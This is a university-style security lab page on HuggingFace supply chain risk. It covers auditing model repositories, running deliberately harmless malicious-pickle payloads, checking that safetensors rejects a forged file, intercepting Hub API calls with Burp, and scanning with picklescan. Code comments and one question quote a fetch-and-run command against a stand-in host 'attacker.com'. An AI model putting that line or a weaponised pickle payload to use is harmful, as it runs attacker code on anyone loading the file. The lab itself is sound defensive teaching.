Classroom Glossary Public page

Lab 4: Supply Chain Audit -- HuggingFace Model Card + Pickle Risk

644 words

Module: 4 (Supply Chain -- LLM03:2025) Duration: 3 hours Substrate: Local Python + Burp Suite Community Points: 8


Objectives

  1. Audit a HuggingFace model repository for supply chain red flags
  2. Demonstrate why pickle is dangerous for model weights
  3. Verify that safetensors loading prevents arbitrary code execution
  4. Intercept HuggingFace Hub API calls with Burp Suite

Setup

# In your AI-101 virtualenv
pip install transformers safetensors huggingface_hub picklescan torch

# Verify
python3 -c "import safetensors, picklescan; print('OK')"

Part 1: Model Card Audit Checklist (45 min)

Audit 3 HuggingFace model repositories using the checklist from Module 4.

Target models (all public, widely used -- no security risk; this is a read-only audit):

  1. distilbert/distilbert-base-uncased (legitimate, well-maintained)
  2. facebook/opt-125m (legitimate; examine its file manifest)
  3. A model of your choice from the HuggingFace Hub (search for a cybersecurity-related model)

For each model, complete this checklist:

from huggingface_hub import HfApi, list_repo_files

api = HfApi()

def audit_model(model_id: str):
    print(f"\n=== AUDITING: {model_id} ===")

    # File manifest
    try:
        files = list(api.list_repo_files(model_id))
        print(f"Files ({len(files)}):")
        for f in files:
            print(f"  {f}")
    except Exception as e:
        print(f"  Error listing files: {e}")
        return

    # Red flag check
    red_flags = []
    file_names = [f.lower() for f in files]

    # Check for pickle files
    pickle_files = [f for f in files if f.endswith(('.bin', '.pt', '.pth', '.pkl'))]
    safetensors_files = [f for f in files if f.endswith('.safetensors')]

    if pickle_files and not safetensors_files:
        red_flags.append(f"PICKLE only (no safetensors): {pickle_files}")

    # Check for unexpected file types
    for f in files:
        if f.endswith(('.sh', '.exe', '.bat')):
            red_flags.append(f"Shell/executable file: {f}")
        if f.endswith('.py') and 'config' not in f.lower():
            red_flags.append(f"Python script: {f}")

    # Check model info
    try:
        info = api.model_info(model_id)
        print(f"\nDownloads (last 30d): {info.downloads}")
        print(f"Likes: {info.likes}")
        print(f"Organization verified: {bool(info.author)}")
        created = info.created_at
        print(f"Created: {created}")
    except Exception as e:
        print(f"Info error: {e}")

    print(f"\nRed flags: {red_flags if red_flags else 'None'}")
    print(f"Has safetensors: {bool(safetensors_files)}")

audit_model("distilbert/distilbert-base-uncased")
audit_model("facebook/opt-125m")
# audit_model("your-chosen-model-id")

Record for each model:

  1. Does the repository provide safetensors variants?
  2. Are there any red flag file types?
  3. Download count and organization verification status
  4. Overall assessment: safe to use / needs further review / avoid

Part 2: The Pickle Danger Demonstration (45 min)

This exercise demonstrates why pickle is dangerous. You will create a malicious pickle file (harmless -- it just prints a message) and observe that it executes code on load.

SAFETY NOTE: This is a local lab. The "malicious" payload only prints text. Never load untrusted pickle files on a system with sensitive data or credentials.

import pickle
import os

class MaliciousPayload:
    def __reduce__(self):
        # __reduce__ is called during unpickling
        # In a real attack, this would be: os.system("curl attacker.com/shell.sh | bash")
        # In the lab, we just print a warning
        return (print, ("PICKLE EXECUTION: arbitrary code ran during model load!",))

# Create the malicious pickle file
malicious_obj = MaliciousPayload()
with open("/tmp/malicious_model.pkl", "wb") as f:
    pickle.dump(malicious_obj, f)

print("Malicious pickle created. Loading it now...")
print("=" * 50)

# Load it -- this triggers the code execution
with open("/tmp/malicious_model.pkl", "rb") as f:
    result = pickle.load(f)   # EXECUTION HAPPENS HERE

print("=" * 50)
print("Load complete. The print statement above ran during unpickling.")

Simulate a "malicious model download":

import torch
import struct

# Create a pickle payload that would exfiltrate environment variables
# (Demonstration only -- no actual network call)
class EnvDumpPayload:
    def __reduce__(self):
        cmd = "python3 -c \"import os; print('ENV KEYS:', list(os.environ.keys())[:5])\""
        return (os.system, (cmd,))

payload = EnvDumpPayload()
with open("/tmp/fake_model_weights.bin", "wb") as f:
    pickle.dump(payload, f)

print("Simulated malicious .bin file created.")
print("In a real attack: torch.load('/tmp/fake_model_weights.bin') would execute the payload.")
print("DO NOT run torch.load() on this file outside of a sandboxed environment.")

Record:

  1. What message printed when you loaded the malicious pickle?
  2. At what point in the pickle.load() call does the code execute?
  3. If the __reduce__ method had contained os.system("curl attacker.com | bash"), what would have happened?

Part 3: Safetensors Prevents Code Execution (30 min)

from safetensors.torch import save_file, load_file
import torch

# Create a legitimate model tensor
tensors = {
    "weight": torch.randn(768, 768),
    "bias": torch.zeros(768)
}

# Save as safetensors
save_file(tensors, "/tmp/legitimate_model.safetensors")
print("Safetensors file created.")

# Load it safely
loaded = load_file("/tmp/legitimate_model.safetensors")
print(f"Loaded tensors: {list(loaded.keys())}")
print(f"Weight shape: {loaded['weight'].shape}")

# Now try to create a "malicious" safetensors file
# Safetensors format: header (JSON) + raw tensor bytes
# The format does NOT have a code execution path -- there is no __reduce__ equivalent

# Attempt to embed a pickle payload in a safetensors file:
# safetensors will refuse to load anything that isn't valid tensor data
import json

# Create a file with a malicious header that claims to contain a "script" tensor
malicious_header = json.dumps({
    "script": {"dtype": "F32", "shape": [1], "data_offsets": [0, 4]}
}).encode()

header_size = struct.pack("<Q", len(malicious_header))
fake_payload = b"XXXX"  # 4 bytes of fake tensor data

with open("/tmp/attempted_malicious.safetensors", "wb") as f:
    f.write(header_size)
    f.write(malicious_header)
    f.write(fake_payload)

# Try to load it
try:
    loaded = load_file("/tmp/attempted_malicious.safetensors")
    print("ERROR: Should not have loaded successfully")
except Exception as e:
    print(f"Safetensors refused to load malicious file: {type(e).__name__}: {e}")

Record:

  1. Did safetensors load the malicious file?
  2. What error did it raise?
  3. Why is the safetensors format inherently safer than pickle?

Part 4: Burp Suite Interception of HuggingFace API Calls (45 min)

Configure Python to route requests through Burp Suite and observe HF Hub API calls.

Setup Burp Suite:

  1. Launch Burp Suite Community
  2. Go to Proxy > Options, confirm listening on 127.0.0.1:8080
  3. Turn off "Intercept" in the Proxy tab (we want to observe, not block)
  4. Go to HTTP History tab

Configure Python proxy:

import os
os.environ["HTTPS_PROXY"] = "http://127.0.0.1:8080"
os.environ["REQUESTS_CA_BUNDLE"] = ""   # Will need Burp's CA cert for HTTPS; see below

# For this lab, use HTTP endpoint to avoid cert issues
os.environ["HTTP_PROXY"] = "http://127.0.0.1:8080"

from huggingface_hub import hf_hub_download
import urllib3
urllib3.disable_warnings()  # Suppress SSL warnings for lab

# Download just the config (small, fast)
# Set verify=False for lab purposes only (normally: install Burp CA cert)
import requests
session = requests.Session()
session.verify = False

from huggingface_hub import HfApi
api = HfApi()

# Make a metadata API call
import httpx
try:
    resp = httpx.get(
        "https://huggingface.co/api/models/distilbert/distilbert-base-uncased",
        proxies={"https://": "http://127.0.0.1:8080"},
        verify=False
    )
    print(f"Status: {resp.status_code}")
    import json
    data = resp.json()
    print(f"Model: {data.get('modelId', 'unknown')}")
    print(f"Downloads: {data.get('downloads', 'N/A')}")
except Exception as e:
    print(f"Error: {e}")
    print("If you see SSL errors, install Burp's CA certificate:")
    print("  Burp > Proxy > Options > Import / export CA certificate")

In Burp HTTP History, observe:

  1. What URL does the HuggingFace Hub API call?
  2. What headers are included in the request?
  3. What JSON fields does the response contain?
  4. If you repeat the call with a model that only has .bin files vs. one that has .safetensors, how does the file manifest differ in the response?

Record:

  1. Screenshot or copy the HTTP request for the metadata call
  2. What User-Agent does the huggingface_hub library send?
  3. What authentication header is included (if any)?
  4. What was in the response's siblings array? (This lists all files in the repository.)

Part 5: picklescan on Downloaded Files (15 min)

# Install picklescan
pip install picklescan

# Create a test directory with our malicious file
cp /tmp/malicious_model.pkl /tmp/scan_test/
cp /tmp/legitimate_model.safetensors /tmp/scan_test/

# Scan
picklescan -p /tmp/scan_test/

Record:

  1. Did picklescan flag the malicious .pkl file?
  2. Did picklescan report anything about the safetensors file?
  3. What command would you add to a CI/CD pipeline to scan model files before deployment?

Lab Report

  1. Threat model. You are a DevSecOps engineer at a company that fine-tunes models from HuggingFace. Write a 3-step supply chain security process that would prevent pickle-based model poisoning. Be specific about where in the download/load pipeline each step runs.

  2. OWASP mapping. Map the pickle code execution attack to the OWASP LLM Top 10 (2025). Which entry is the primary mapping? Is there a secondary mapping?

  3. Burp findings. What did you learn from intercepting the HuggingFace API call that you could not have learned just by reading the huggingface_hub documentation?


Grading (8 points)

Item Points
Part 1: 3 models audited with checklist; findings documented 2
Parts 2-3: pickle execution demonstrated; safetensors rejection demonstrated 2
Part 4: Burp intercept working; API call captured and analyzed 2
Lab report: all 3 questions answered 2